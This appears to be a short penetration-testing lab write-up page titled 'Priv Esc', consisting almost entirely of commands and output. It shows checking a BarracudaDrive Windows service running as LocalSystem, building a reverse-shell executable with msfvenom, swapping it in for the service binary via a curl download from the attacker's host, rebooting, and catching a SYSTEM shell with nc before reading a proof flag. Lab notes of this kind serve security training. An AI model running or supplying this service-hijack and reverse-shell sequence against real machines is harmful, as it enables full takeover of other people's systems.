Priv Esc

PS C:\xampp\htdocs> sc.exe qc bd
sc.exe qc bd
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bd
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\bd\bd.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BarracudaDrive ( bd ) service
        DEPENDENCIES       : Tcpip
        SERVICE_START_NAME : LocalSystem

❯ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.239 LPORT=8000 -f exe -o pwned.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: pwned.exe

PS C:\bd> move bd.exe bd1.exe

PS C:\bd> curl 192.168.45.239/pwned.exe -o bd.exe

PS C:\bd> shutdown /r /t 0

❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 49669
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
whoami && type C:\Users\Administrator\Desktop\proof.txt && ipconfig
nt authority\system
f2c6612b432ee1661a9c6b47b6500c8f

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.160.127
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.160.254

PreviousFoothold NextCredentials / Notes / LL

Last updated 4 months ago